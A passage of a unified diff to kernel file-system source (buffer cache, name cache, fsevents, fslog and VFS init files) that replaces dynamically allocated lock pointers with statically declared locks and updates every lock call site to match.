allocbuf(buf_t bp, int size) * Remove the buffer from the hash. Return the buffer and the queue * on which it was found. 
* - * buf_mtxp is held upon entry - * returns with buf_mtxp locked if new buf available - * returns with buf_mtxp UNlocked if new buf NOT available + * buf_mtx is held upon entry + * returns with buf_mtx locked if new buf available + * returns with buf_mtx UNlocked if new buf NOT available */ static buf_t @@ -3677,7 +3661,7 @@ start: */ add_newbufs: - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); /* Create a new temporary buffer header */ bp = (struct buf *)zalloc(buf_hdr_zone); @@ -3690,7 +3674,7 @@ add_newbufs: SET(bp->b_flags, B_HDRALLOC); *queue = BQ_EMPTY; } - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (bp) { binshash(bp, &invalhash); @@ -3710,7 +3694,7 @@ add_newbufs: /* the hz value is 100; which leads to 10ms */ ts.tv_nsec = (slptimeo % 1000) * NSEC_PER_USEC * 1000 * 10; - msleep(&needbuffer, buf_mtxp, slpflag | PDROP | (PRIBIO + 1), "getnewbuf", &ts); + msleep(&needbuffer, &buf_mtx, slpflag | PDROP | (PRIBIO + 1), "getnewbuf", &ts); return NULL; } @@ -3793,8 +3777,8 @@ found: * Returns 1 if issued a buf_bawrite() to indicate * that the buffer is not ready. 
* - * buf_mtxp is held upon entry - * returns with buf_mtxp locked + * buf_mtx is held upon entry + * returns with buf_mtx locked */ int bcleanbuf(buf_t bp, boolean_t discard) @@ -3817,7 +3801,7 @@ bcleanbuf(buf_t bp, boolean_t discard) bmovelaundry(bp); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); wakeup(&bufqueues[BQ_LAUNDRY]); /* @@ -3825,7 +3809,7 @@ bcleanbuf(buf_t bp, boolean_t discard) */ (void)thread_block(THREAD_CONTINUE_NULL); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); return 1; } @@ -3848,7 +3832,7 @@ bcleanbuf(buf_t bp, boolean_t discard) brelvp_locked(bp); } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); BLISTNONE(bp); @@ -3862,7 +3846,7 @@ bcleanbuf(buf_t bp, boolean_t discard) /* If discarding, just move to the empty queue */ if (discard) { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); CLR(bp->b_flags, (B_META | B_ZALLOC | B_DELWRI | B_LOCKED | B_AGE | B_ASYNC | B_NOCACHE | B_FUA)); bp->b_whichq = BQ_EMPTY; binshash(bp, &invalhash); @@ -3898,7 +3882,7 @@ bcleanbuf(buf_t bp, boolean_t discard) bp->b_validoff = bp->b_validend = 0; bzero(&bp->b_attr, sizeof(struct bufattr)); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); } return 0; } @@ -3915,20 +3899,20 @@ buf_invalblkno(vnode_t vp, daddr64_t lblkno, int flags) dp = BUFHASH(vp, lblkno); relook: - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if ((bp = incore_locked(vp, lblkno, dp)) == (struct buf *)0) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return 0; } if (ISSET(bp->b_lflags, BL_BUSY)) { if (!ISSET(flags, BUF_WAIT)) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return EBUSY; } SET(bp->b_lflags, BL_WANTED); - error = msleep((caddr_t)bp, buf_mtxp, PDROP | (PRIBIO + 1), "buf_invalblkno", NULL); + error = msleep((caddr_t)bp, &buf_mtx, PDROP | (PRIBIO + 1), "buf_invalblkno", NULL); if (error) { return error; @@ -3943,7 +3927,7 @@ relook: bp->b_owner = current_thread(); bp->b_tag = 4; #endif - 
lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); buf_brelse(bp); return 0; @@ -3955,12 +3939,12 @@ buf_drop(buf_t bp) { int need_wakeup = 0; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (ISSET(bp->b_lflags, BL_WANTED)) { /* * delay the actual wakeup until after we - * clear BL_BUSY and we've dropped buf_mtxp + * clear BL_BUSY and we've dropped buf_mtx */ need_wakeup = 1; } @@ -3974,7 +3958,7 @@ buf_drop(buf_t bp) CLR(bp->b_lflags, (BL_BUSY | BL_WANTED)); buf_busycount--; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (need_wakeup) { /* @@ -3990,11 +3974,11 @@ buf_acquire(buf_t bp, int flags, int slpflag, int slptimeo) { errno_t error; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); error = buf_acquire_locked(bp, flags, slpflag, slptimeo); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return error; } @@ -4029,7 +4013,7 @@ buf_acquire_locked(buf_t bp, int flags, int slpflag, int slptimeo) /* the hz value is 100; which leads to 10ms */ ts.tv_sec = (slptimeo / 100); ts.tv_nsec = (slptimeo % 100) * 10 * NSEC_PER_USEC * 1000; - error = msleep((caddr_t)bp, buf_mtxp, slpflag | (PRIBIO + 1), "buf_acquire", &ts); + error = msleep((caddr_t)bp, &buf_mtx, slpflag | (PRIBIO + 1), "buf_acquire", &ts); if (error) { return error; @@ -4058,14 +4042,14 @@ errno_t buf_biowait(buf_t bp) { while (!ISSET(bp->b_flags, B_DONE)) { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (!ISSET(bp->b_flags, B_DONE)) { DTRACE_IO1(wait__start, buf_t, bp); - (void) msleep(bp, buf_mtxp, PDROP | (PRIBIO + 1), "buf_biowait", NULL); + (void) msleep(bp, &buf_mtx, PDROP | (PRIBIO + 1), "buf_biowait", NULL); DTRACE_IO1(wait__done, buf_t, bp); } else { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } } /* check for interruption of I/O (e.g. via NFS), then errors. 
*/ @@ -4259,12 +4243,12 @@ buf_biodone(buf_t bp) * they do get to run, their going to re-set * BL_WANTED and go back to sleep */ - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); CLR(bp->b_lflags, BL_WANTED); SET(bp->b_flags, B_DONE); /* note that it's done */ - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); wakeup(bp); } @@ -4295,13 +4279,13 @@ count_lock_queue(void) buf_t bp; int n = 0; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); for (bp = bufqueues[BQ_LOCKED].tqh_first; bp; bp = bp->b_freelist.tqe_next) { n++; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return n; } @@ -4338,13 +4322,13 @@ vfs_bufstats() counts[j] = 0; } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); for (bp = dp->tqh_first; bp; bp = bp->b_freelist.tqe_next) { counts[bp->b_bufsize / CLBYTES]++; count++; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); printf("%s: total-%d", bname[i], count); for (j = 0; j <= MAXBSIZE / CLBYTES; j++) { @@ -4369,7 +4353,7 @@ alloc_io_buf(vnode_t vp, int priv) mount_t mp = NULL; int alloc_for_virtualdev = FALSE; - lck_mtx_lock_spin(iobuffer_mtxp); + lck_mtx_lock_spin(&iobuffer_mtxp); /* * We subject iobuf requests for diskimages to additional restrictions. 
@@ -4388,7 +4372,7 @@ alloc_io_buf(vnode_t vp, int priv) bufstats.bufs_iobufsleeps++; need_iobuffer = 1; - (void)msleep(&need_iobuffer, iobuffer_mtxp, + (void)msleep(&need_iobuffer, &iobuffer_mtxp, PSPIN | (PRIBIO + 1), (const char *)"alloc_io_buf (1)", NULL); } @@ -4399,7 +4383,7 @@ alloc_io_buf(vnode_t vp, int priv) bufstats.bufs_iobufsleeps++; need_iobuffer = 1; - (void)msleep(&need_iobuffer, iobuffer_mtxp, PSPIN | (PRIBIO + 1), + (void)msleep(&need_iobuffer, &iobuffer_mtxp, PSPIN | (PRIBIO + 1), (const char *)"alloc_io_buf (2)", NULL); } TAILQ_REMOVE(&iobufqueue, bp, b_freelist); @@ -4414,7 +4398,7 @@ alloc_io_buf(vnode_t vp, int priv) bufstats.bufs_iobufinuse_vdev++; } - lck_mtx_unlock(iobuffer_mtxp); + lck_mtx_unlock(&iobuffer_mtxp); /* * initialize various fields @@ -4481,7 +4465,7 @@ free_io_buf(buf_t bp) /* Zero out the bufattr and its flags before relinquishing this iobuf */ bzero(&bp->b_attr, sizeof(struct bufattr)); - lck_mtx_lock_spin(iobuffer_mtxp); + lck_mtx_lock_spin(&iobuffer_mtxp); binsheadfree(bp, &iobufqueue, -1); @@ -4511,7 +4495,7 @@ free_io_buf(buf_t bp) } } - lck_mtx_unlock(iobuffer_mtxp); + lck_mtx_unlock(&iobuffer_mtxp); if (need_wakeup) { wakeup(&need_iobuffer); @@ -4522,13 +4506,13 @@ free_io_buf(buf_t bp) void buf_list_lock(void) { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); } void buf_list_unlock(void) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } /* @@ -4559,10 +4543,10 @@ bcleanbuf_thread(void) int loopcnt = 0; for (;;) { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); while ((bp = TAILQ_FIRST(&bufqueues[BQ_LAUNDRY])) == NULL) { - (void)msleep0(&bufqueues[BQ_LAUNDRY], buf_mtxp, PRIBIO | PDROP, "blaundry", 0, (bcleanbufcontinuation)bcleanbuf_thread); + (void)msleep0(&bufqueues[BQ_LAUNDRY], &buf_mtx, PRIBIO | PDROP, "blaundry", 0, (bcleanbufcontinuation)bcleanbuf_thread); } /* @@ -4581,7 +4565,7 @@ bcleanbuf_thread(void) bp->b_tag = 10; #endif - lck_mtx_unlock(buf_mtxp); + 
lck_mtx_unlock(&buf_mtx); /* * do the IO */ @@ -4591,7 +4575,7 @@ bcleanbuf_thread(void) bp->b_whichq = BQ_LAUNDRY; bp->b_timestamp = buf_timestamp(); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); binstailfree(bp, &bufqueues[BQ_LAUNDRY], BQ_LAUNDRY); blaundrycnt++; @@ -4604,7 +4588,7 @@ bcleanbuf_thread(void) bp->b_tag = 11; #endif - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (loopcnt > MAXLAUNDRY) { /* @@ -4686,24 +4670,24 @@ dump_buffer: int fs_buffer_cache_gc_register(void (* callout)(int, void *), void *context) { - lck_mtx_lock(buf_gc_callout); + lck_mtx_lock(&buf_gc_callout); for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) { if (fs_callouts[i].callout == NULL) { fs_callouts[i].callout = callout; fs_callouts[i].context = context; - lck_mtx_unlock(buf_gc_callout); + lck_mtx_unlock(&buf_gc_callout); return 0; } } - lck_mtx_unlock(buf_gc_callout); + lck_mtx_unlock(&buf_gc_callout); return ENOMEM; } int fs_buffer_cache_gc_unregister(void (* callout)(int, void *), void *context) { - lck_mtx_lock(buf_gc_callout); + lck_mtx_lock(&buf_gc_callout); for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) { if (fs_callouts[i].callout == callout && fs_callouts[i].context == context) { @@ -4711,20 +4695,20 @@ fs_buffer_cache_gc_unregister(void (* callout)(int, void *), void *context) fs_callouts[i].context = NULL; } } - lck_mtx_unlock(buf_gc_callout); + lck_mtx_unlock(&buf_gc_callout); return 0; } static void fs_buffer_cache_gc_dispatch_callouts(int all) { - lck_mtx_lock(buf_gc_callout); + lck_mtx_lock(&buf_gc_callout); for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) { if (fs_callouts[i].callout != NULL) { fs_callouts[i].callout(all, fs_callouts[i].context); } } - lck_mtx_unlock(buf_gc_callout); + lck_mtx_unlock(&buf_gc_callout); } static boolean_t @@ -4747,10 +4731,10 @@ buffer_cache_gc(int all) * for deep sleep), we only evict up to BUF_MAX_GC_BATCH_SIZE buffers * that have not been accessed in the last 
BUF_STALE_THRESHOLD seconds. * BUF_MAX_GC_BATCH_SIZE controls both the hold time of the global lock - * "buf_mtxp" and the length of time we spend compute bound in the GC + * "buf_mtx" and the length of time we spend compute bound in the GC * thread which calls this function */ - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); do { found = 0; @@ -4803,7 +4787,7 @@ buffer_cache_gc(int all) } /* Drop lock for batch processing */ - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); /* Wakeup and yield for laundry if need be */ if (need_wakeup) { @@ -4832,7 +4816,7 @@ buffer_cache_gc(int all) bp->b_whichq = BQ_EMPTY; BLISTNONE(bp); } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); /* Back under lock, move them all to invalid hash and clear busy */ TAILQ_FOREACH(bp, &privq, b_freelist) { @@ -4853,7 +4837,7 @@ buffer_cache_gc(int all) TAILQ_CONCAT(&bufqueues[BQ_EMPTY], &privq, b_freelist); } while (all && (found == BUF_MAX_GC_BATCH_SIZE)); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); fs_buffer_cache_gc_dispatch_callouts(all); @@ -4898,7 +4882,7 @@ bflushq(int whichq, mount_t mp) } restart: - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); bp = TAILQ_FIRST(&bufqueues[whichq]); @@ -4923,7 +4907,7 @@ restart: total_writes++; if (buf_count >= NFLUSH) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); qsort(flush_table, buf_count, sizeof(struct buf *), bp_cmp); @@ -4934,7 +4918,7 @@ restart: } } } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (buf_count > 0) { qsort(flush_table, buf_count, sizeof(struct buf *), bp_cmp); diff --git a/bsd/vfs/vfs_cache.c b/bsd/vfs/vfs_cache.c index 9d4ed9a6d..8f75a2736 100644 --- a/bsd/vfs/vfs_cache.c +++ b/bsd/vfs/vfs_cache.c @@ -145,21 +145,15 @@ struct nchstats nchstats; /* cache effectiveness statistics */ /* vars for name cache list lock */ -lck_grp_t * namecache_lck_grp; -lck_grp_attr_t * namecache_lck_grp_attr; -lck_attr_t * namecache_lck_attr; +static LCK_GRP_DECLARE(namecache_lck_grp, "Name 
Cache"); +static LCK_RW_DECLARE(namecache_rw_lock, &namecache_lck_grp); -lck_grp_t * strcache_lck_grp; -lck_grp_attr_t * strcache_lck_grp_attr; -lck_attr_t * strcache_lck_attr; +static LCK_GRP_DECLARE(strcache_lck_grp, "String Cache"); +static LCK_ATTR_DECLARE(strcache_lck_attr, 0, 0); +LCK_RW_DECLARE_ATTR(strtable_rw_lock, &strcache_lck_grp, &strcache_lck_attr); -lck_grp_t * rootvnode_lck_grp; -lck_grp_attr_t * rootvnode_lck_grp_attr; -lck_attr_t * rootvnode_lck_attr; - -lck_rw_t * namecache_rw_lock; -lck_rw_t * strtable_rw_lock; -lck_rw_t * rootvnode_rw_lock; +static LCK_GRP_DECLARE(rootvnode_lck_grp, "rootvnode"); +LCK_RW_DECLARE(rootvnode_rw_lock, &rootvnode_lck_grp); #define NUM_STRCACHE_LOCKS 1024 @@ -2400,8 +2394,6 @@ init_crc32(void) void nchinit(void) { - int i; - desiredNegNodes = (desiredvnodes / 10); desiredNodes = desiredvnodes + desiredNegNodes; @@ -2416,61 +2408,27 @@ nchinit(void) init_string_table(); - /* Allocate name cache lock group attribute and group */ - namecache_lck_grp_attr = lck_grp_attr_alloc_init(); - - namecache_lck_grp = lck_grp_alloc_init("Name Cache", namecache_lck_grp_attr); - - /* Allocate name cache lock attribute */ - namecache_lck_attr = lck_attr_alloc_init(); - - /* Allocate name cache lock */ - namecache_rw_lock = lck_rw_alloc_init(namecache_lck_grp, namecache_lck_attr); - - - /* Allocate string cache lock group attribute and group */ - strcache_lck_grp_attr = lck_grp_attr_alloc_init(); - - strcache_lck_grp = lck_grp_alloc_init("String Cache", strcache_lck_grp_attr); - - /* Allocate string cache lock attribute */ - strcache_lck_attr = lck_attr_alloc_init(); - - /* Allocate string cache lock */ - strtable_rw_lock = lck_rw_alloc_init(strcache_lck_grp, strcache_lck_attr); - - for (i = 0; i < NUM_STRCACHE_LOCKS; i++) { - lck_mtx_init(&strcache_mtx_locks[i], strcache_lck_grp, strcache_lck_attr); + for (int i = 0; i < NUM_STRCACHE_LOCKS; i++) { + lck_mtx_init(&strcache_mtx_locks[i], &strcache_lck_grp, &strcache_lck_attr); } - - /* 
Allocate root vnode lock group attribute and group */ - rootvnode_lck_grp_attr = lck_grp_attr_alloc_init(); - - rootvnode_lck_grp = lck_grp_alloc_init("rootvnode", rootvnode_lck_grp_attr); - - /* Allocate rootvnode lock attribute */ - rootvnode_lck_attr = lck_attr_alloc_init(); - - /* Allocate rootvnode lock */ - rootvnode_rw_lock = lck_rw_alloc_init(rootvnode_lck_grp, rootvnode_lck_attr); } void name_cache_lock_shared(void) { - lck_rw_lock_shared(namecache_rw_lock); + lck_rw_lock_shared(&namecache_rw_lock); } void name_cache_lock(void) { - lck_rw_lock_exclusive(namecache_rw_lock); + lck_rw_lock_exclusive(&namecache_rw_lock); } void name_cache_unlock(void) { - lck_rw_done(namecache_rw_lock); + lck_rw_done(&namecache_rw_lock); } @@ -2718,10 +2676,10 @@ resize_string_ref_table(void) * the lock exclusively in case some other thread * beat us to the punch */ - lck_rw_lock_exclusive(strtable_rw_lock); + lck_rw_lock_exclusive(&strtable_rw_lock); if (4 * filled_buckets < ((string_table_mask + 1) * 3)) { - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); return; } assert(string_table_mask < INT32_MAX); @@ -2729,7 +2687,7 @@ resize_string_ref_table(void) if (new_table == NULL) { printf("failed to resize the hash table.\n"); - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); return; } @@ -2755,7 +2713,7 @@ resize_string_ref_table(void) LIST_INSERT_HEAD(head, entry, hash_chain); } } - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); FREE(old_table, M_CACHE); } @@ -2806,17 +2764,17 @@ add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_ * if someone else decides to grow the pool they * will take this lock exclusively */ - lck_rw_lock_shared(strtable_rw_lock); + lck_rw_lock_shared(&strtable_rw_lock); /* * If the table gets more than 3/4 full, resize it */ if (4 * filled_buckets >= ((string_table_mask + 1) * 3)) { - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); 
resize_string_ref_table(); - lck_rw_lock_shared(strtable_rw_lock); + lck_rw_lock_shared(&strtable_rw_lock); } hash_index = hashval & string_table_mask; lock_index = hash_index % NUM_STRCACHE_LOCKS; @@ -2853,7 +2811,7 @@ add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_ } lck_mtx_unlock(&strcache_mtx_locks[lock_index]); - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); return (const char *)entry->str; } @@ -2876,7 +2834,7 @@ vfs_removename(const char *nameref) * if someone else decides to grow the pool they * will take this lock exclusively */ - lck_rw_lock_shared(strtable_rw_lock); + lck_rw_lock_shared(&strtable_rw_lock); /* * must compute the head behind the table lock * since the size and location of the table @@ -2907,7 +2865,7 @@ vfs_removename(const char *nameref) } } lck_mtx_unlock(&strcache_mtx_locks[lock_index]); - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); kheap_free_addr(KHEAP_DEFAULT, entry); @@ -2923,7 +2881,7 @@ dump_string_table(void) string_t *entry; u_long i; - lck_rw_lock_shared(strtable_rw_lock); + lck_rw_lock_shared(&strtable_rw_lock); for (i = 0; i <= string_table_mask; i++) { head = &string_ref_table[i]; @@ -2931,6 +2889,6 @@ dump_string_table(void) printf("%6d - %s\n", entry->refcount, entry->str); } } - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); } #endif /* DUMP_STRING_TABLE */ diff --git a/bsd/vfs/vfs_fsevents.c b/bsd/vfs/vfs_fsevents.c index fb8e519e2..2507a242c 100644 --- a/bsd/vfs/vfs_fsevents.c +++ b/bsd/vfs/vfs_fsevents.c @@ -152,16 +152,18 @@ static void fsevents_wakeup(fs_event_watcher *watcher); // // Locks // -static lck_grp_attr_t * fsevent_group_attr; -static lck_attr_t * fsevent_lock_attr; -static lck_grp_t * fsevent_mutex_group; +static LCK_ATTR_DECLARE(fsevent_lock_attr, 0, 0); +static LCK_GRP_DECLARE(fsevent_mutex_group, "fsevent-mutex"); +static LCK_GRP_DECLARE(fsevent_rw_group, "fsevent-rw"); -static lck_grp_t * fsevent_rw_group; - 
-static lck_rw_t event_handling_lock; // handles locking for event manipulation and recycling -static lck_mtx_t watch_table_lock; -static lck_mtx_t event_buf_lock; -static lck_mtx_t event_writer_lock; +static LCK_RW_DECLARE_ATTR(event_handling_lock, // handles locking for event manipulation and recycling + &fsevent_rw_group, &fsevent_lock_attr); +static LCK_MTX_DECLARE_ATTR(watch_table_lock, + &fsevent_mutex_group, &fsevent_lock_attr); +static LCK_MTX_DECLARE_ATTR(event_buf_lock, + &fsevent_mutex_group, &fsevent_lock_attr); +static LCK_MTX_DECLARE_ATTR(event_writer_lock, + &fsevent_mutex_group, &fsevent_lock_attr); /* Explicitly declare qsort so compiler doesn't complain */ @@ -204,29 +206,16 @@ fsevents_internal_init(void) memset(watcher_table, 0, sizeof(watcher_table)); - fsevent_lock_attr = lck_attr_alloc_init(); - fsevent_group_attr = lck_grp_attr_alloc_init(); - fsevent_mutex_group = lck_grp_alloc_init("fsevent-mutex", fsevent_group_attr); - fsevent_rw_group = lck_grp_alloc_init("fsevent-rw", fsevent_group_attr); - - lck_mtx_init(&watch_table_lock, fsevent_mutex_group, fsevent_lock_attr); - lck_mtx_init(&event_buf_lock, fsevent_mutex_group, fsevent_lock_attr); - lck_mtx_init(&event_writer_lock, fsevent_mutex_group, fsevent_lock_attr); - - lck_rw_init(&event_handling_lock, fsevent_rw_group, fsevent_lock_attr); - PE_get_default("kern.maxkfsevents", &max_kfs_events, sizeof(max_kfs_events)); event_zone = zone_create_ext("fs-event-buf", sizeof(kfs_event), ZC_NOGC | ZC_NOCALLOUT, ZONE_ID_ANY, ^(zone_t z) { // mark the zone as exhaustible so that it will not // ever grow beyond what we initially filled it with - zone_set_exhaustible(z, max_kfs_events * sizeof(kfs_event)); + zone_set_exhaustible(z, max_kfs_events); }); - if (zfill(event_zone, max_kfs_events) < max_kfs_events) { - printf("fsevents: failed to pre-fill the event zone.\n"); - } + zone_fill_initially(event_zone, max_kfs_events); } static void diff --git a/bsd/vfs/vfs_fslog.c b/bsd/vfs/vfs_fslog.c index 
4ba18afa4..366e5170a 100644 --- a/bsd/vfs/vfs_fslog.c +++ b/bsd/vfs/vfs_fslog.c @@ -111,15 +111,8 @@ fslog_extmod_msgtracer(proc_t caller, proc_t target) * Log information about floating point exception handling */ -static lck_mtx_t fpxlock; - -void -fpxlog_init(void) -{ - lck_grp_attr_t *lck_grp_attr = lck_grp_attr_alloc_init(); - lck_grp_t *lck_grp = lck_grp_alloc_init("fpx", lck_grp_attr); - lck_mtx_init(&fpxlock, lck_grp, LCK_ATTR_NULL); -} +static LCK_GRP_DECLARE(fpxlock_grp, "fpx"); +static LCK_MTX_DECLARE(fpxlock, &fpxlock_grp); struct fpx_event { uuid_t fe_uuid; @@ -269,11 +262,4 @@ fpxlog( NULL); } -#else - -void -fpxlog_init(void) -{ -} - #endif /* __x86_64__ */ diff --git a/bsd/vfs/vfs_init.c b/bsd/vfs/vfs_init.c index 441d9269f..99f99e44e 100644 --- a/bsd/vfs/vfs_init.c +++ b/bsd/vfs/vfs_init.c @@ -270,53 +270,23 @@ vfs_op_init(void) extern struct vnodeops dead_vnodeops; extern struct vnodeops spec_vnodeops; -/* vars for vnode lock */ -lck_grp_t * vnode_lck_grp; -lck_grp_attr_t * vnode_lck_grp_attr; -lck_attr_t * vnode_lck_attr; - -#if CONFIG_TRIGGERS -/* vars for vnode trigger resolver */ -lck_grp_t * trigger_vnode_lck_grp; -lck_grp_attr_t * trigger_vnode_lck_grp_attr; -lck_attr_t * trigger_vnode_lck_attr; -#endif - -lck_grp_t * fd_vn_lck_grp; -lck_grp_attr_t * fd_vn_lck_grp_attr; -lck_attr_t * fd_vn_lck_attr; - /* vars for vnode list lock */ -lck_grp_t * vnode_list_lck_grp; -lck_grp_attr_t * vnode_list_lck_grp_attr; -lck_attr_t * vnode_list_lck_attr; -lck_spin_t * vnode_list_spin_lock; -lck_mtx_t * spechash_mtx_lock; - -/* vars for vfsconf lock */ -lck_grp_t * fsconf_lck_grp; -lck_grp_attr_t * fsconf_lck_grp_attr; -lck_attr_t * fsconf_lck_attr; - +static LCK_GRP_DECLARE(vnode_list_lck_grp, "vnode list"); +static LCK_ATTR_DECLARE(vnode_list_lck_attr, 0, 0); +static LCK_SPIN_DECLARE_ATTR(vnode_list_spin_lock, + &vnode_list_lck_grp, &vnode_list_lck_attr); +static LCK_MTX_DECLARE_ATTR(spechash_mtx_lock, + &vnode_list_lck_grp, &vnode_list_lck_attr); 
+LCK_MTX_DECLARE_ATTR(pkg_extensions_lck, + &vnode_list_lck_grp, &vnode_list_lck_attr); /* vars for mount lock */ -lck_grp_t * mnt_lck_grp; -lck_grp_attr_t * mnt_lck_grp_attr; -lck_attr_t * mnt_lck_attr; +static LCK_GRP_DECLARE(mnt_lck_grp, "mount"); +static LCK_ATTR_DECLARE(mnt_lck_attr, 0, 0); /* vars for mount list lock */ -lck_grp_t * mnt_list_lck_grp; -lck_grp_attr_t * mnt_list_lck_grp_attr; -lck_attr_t * mnt_list_lck_attr; -lck_mtx_t * mnt_list_mtx_lock; - -/* vars for sync mutex */ -lck_grp_t * sync_mtx_lck_grp; -lck_grp_attr_t * sync_mtx_lck_grp_attr; -lck_attr_t * sync_mtx_lck_attr; -lck_mtx_t * sync_mtx_lck; - -lck_mtx_t *pkg_extensions_lck; +static LCK_GRP_DECLARE(mnt_list_lck_grp, "mount list"); +LCK_MTX_DECLARE(mnt_list_mtx_lock, &mnt_list_lck_grp); struct mount * dead_mountp; @@ -330,77 +300,6 @@ vfsinit(void) int i, maxtypenum; struct mount * mp; - /* Allocate vnode list lock group attribute and group */ - vnode_list_lck_grp_attr = lck_grp_attr_alloc_init(); - - vnode_list_lck_grp = lck_grp_alloc_init("vnode list", vnode_list_lck_grp_attr); - - /* Allocate vnode list lock attribute */ - vnode_list_lck_attr = lck_attr_alloc_init(); - - /* Allocate vnode list lock */ - vnode_list_spin_lock = lck_spin_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr); - - /* Allocate spec hash list lock */ - spechash_mtx_lock = lck_mtx_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr); - - /* Allocate the package extensions table lock */ - pkg_extensions_lck = lck_mtx_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr); - - /* allocate vnode lock group attribute and group */ - vnode_lck_grp_attr = lck_grp_attr_alloc_init(); - - vnode_lck_grp = lck_grp_alloc_init("vnode", vnode_lck_grp_attr); - - /* Allocate vnode lock attribute */ - vnode_lck_attr = lck_attr_alloc_init(); - -#if CONFIG_TRIGGERS - trigger_vnode_lck_grp_attr = lck_grp_attr_alloc_init(); - trigger_vnode_lck_grp = lck_grp_alloc_init("trigger_vnode", trigger_vnode_lck_grp_attr); - trigger_vnode_lck_attr 
= lck_attr_alloc_init(); -#endif - /* Allocate per fd vnode data lock attribute and group */ - fd_vn_lck_grp_attr = lck_grp_attr_alloc_init(); - fd_vn_lck_grp = lck_grp_alloc_init("fd_vnode_data", fd_vn_lck_grp_attr); - fd_vn_lck_attr = lck_attr_alloc_init(); - - /* Allocate fs config lock group attribute and group */ - fsconf_lck_grp_attr = lck_grp_attr_alloc_init(); - - fsconf_lck_grp = lck_grp_alloc_init("fs conf", fsconf_lck_grp_attr); - - /* Allocate fs config lock attribute */ - fsconf_lck_attr = lck_attr_alloc_init(); - - /* Allocate mount point related lock structures */ - - /* Allocate mount list lock group attribute and group */ - mnt_list_lck_grp_attr = lck_grp_attr_alloc_init(); - - mnt_list_lck_grp = lck_grp_alloc_init("mount list", mnt_list_lck_grp_attr); - - /* Allocate mount list lock attribute */ - mnt_list_lck_attr = lck_attr_alloc_init(); - - /* Allocate mount list lock */ - mnt_list_mtx_lock = lck_mtx_alloc_init(mnt_list_lck_grp, mnt_list_lck_attr); - - - /* allocate mount lock group attribute and group */ - mnt_lck_grp_attr = lck_grp_attr_alloc_init(); - - mnt_lck_grp = lck_grp_alloc_init("mount", mnt_lck_grp_attr); - - /* Allocate mount lock attribute */ - mnt_lck_attr = lck_attr_alloc_init(); - - /* Allocate sync lock */ - sync_mtx_lck_grp_attr = lck_grp_attr_alloc_init(); - sync_mtx_lck_grp = lck_grp_alloc_init("sync thread", sync_mtx_lck_grp_attr); - sync_mtx_lck_attr = lck_attr_alloc_init(); - sync_mtx_lck = lck_mtx_alloc_init(sync_mtx_lck_grp, sync_mtx_lck_attr); - /* * Initialize the vnode table */ @@ -471,13 +370,6 @@ vfsinit(void) */ vnode_authorize_init(); - /* - * Initialiize the quota system. 
